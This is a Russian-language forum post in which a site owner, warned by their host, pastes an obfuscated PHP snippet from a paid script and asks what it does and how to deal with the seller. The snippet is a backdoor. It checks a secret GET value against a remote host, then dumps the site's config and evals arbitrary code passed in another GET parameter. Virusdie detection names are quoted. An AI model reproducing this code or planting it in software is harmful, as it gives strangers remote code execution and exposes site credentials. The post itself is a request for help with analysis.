Хостинг сообщил что в скрипте имеется вредоносное по!
${"GLOBALS"}["zhnlnvpxiov"] = "config";
${"GLOBALS"}["rchmyoafpzb"] = "oloki";
if (!empty($_GET["doConfirmLoki"])) {
${"GLOBALS"}["hypqdo"] = "cloki";
${"GLOBALS"}["zbgjvvsxd"] = "cloki";
${"GLOBALS"}["gjsqnjxdtv"] = "oloki";
$bqhzcuynfrb = "cloki";
${${"GLOBALS"}["hypqdo"]} = $_GET["doConfirmLoki"];
${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb});
if (${${"GLOBALS"}["rchmyoafpzb"]} === ${${"GLOBALS"}["zbgjvvsxd"]}) {
echo '<pre>';
print_r(${${"GLOBALS"}["zhnlnvpxiov"]});
echo '</pre>';
if (isset($_GET["uloki"])) eval($_GET["uloki"]);
}
die;
}
Что-бы не указывать название стороннего сайта в get я использовал символы xxxxx что-бы это значило?
{VIRUSDIE}Eval.request
{VIRUSDIE}Obfuscated.Globals.Names
могу даже указать кто продает скрипт с данным функционалом! и человек который его продает лицензию данного скрипта говорит следующие:
Я: тобищь нарушив ваши правила вы портите проект вашему клиенту таким образом?
Владелец-скрипта: Каждый случай уникален...
является ли данный код опасным и что он делает? и как бороться с тем кто распространяет данный скрипт еще и платно?
Каждый php файл с данном скрипте имеет следующие: if (!defined("TKM")) die("Access denied!");